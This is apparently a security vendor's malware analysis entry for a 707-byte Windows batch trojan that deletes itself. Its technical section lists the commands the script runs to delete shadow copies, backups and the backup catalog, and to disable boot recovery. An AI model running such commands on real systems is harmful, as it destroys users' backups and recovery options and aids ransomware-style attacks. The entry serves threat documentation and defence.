Analysis by: Clive Fuentebella
ALIASES:

Trojan.Script.Agent.cr (KASPERSKY)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes then deletes itself afterward.

  TECHNICAL DETAILS

Tamaño del archivo 707 bytes
Tipo de archivo BAT
Residente en memoria No

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following files:

  • {Current directory}\sc.txt

It adds the following processes:

  • wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
  • wbadmin DELETE BACKUP -keepVersions:0
  • wmic SHADOWCOPY DELETE
  • vssadmin Delete Shadows /All /Quiet
  • bcdedit /set {default} recoveryenabled No
  • bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • vssadmin list shadows
  • cmd.exe /C wbadmin STOP job
  • cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet
  • cmd.exe /C wbadmin DELETE CATALOG -quiet
  • cmd.exe /C wbadmin DISABLE backup
  • cmd.exe /C bcdedit /set {default} recoveryenabled No
  • cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • cd "{Current directory}"
  • echo delete shadows all>>sc.txt
  • echo exit>>sc.txt
  • cmd.exe /C diskshadow -s sc.txt
  • del /f "{Current directory}\sc.txt"
  • pause
  • del %0

It executes then deletes itself afterward.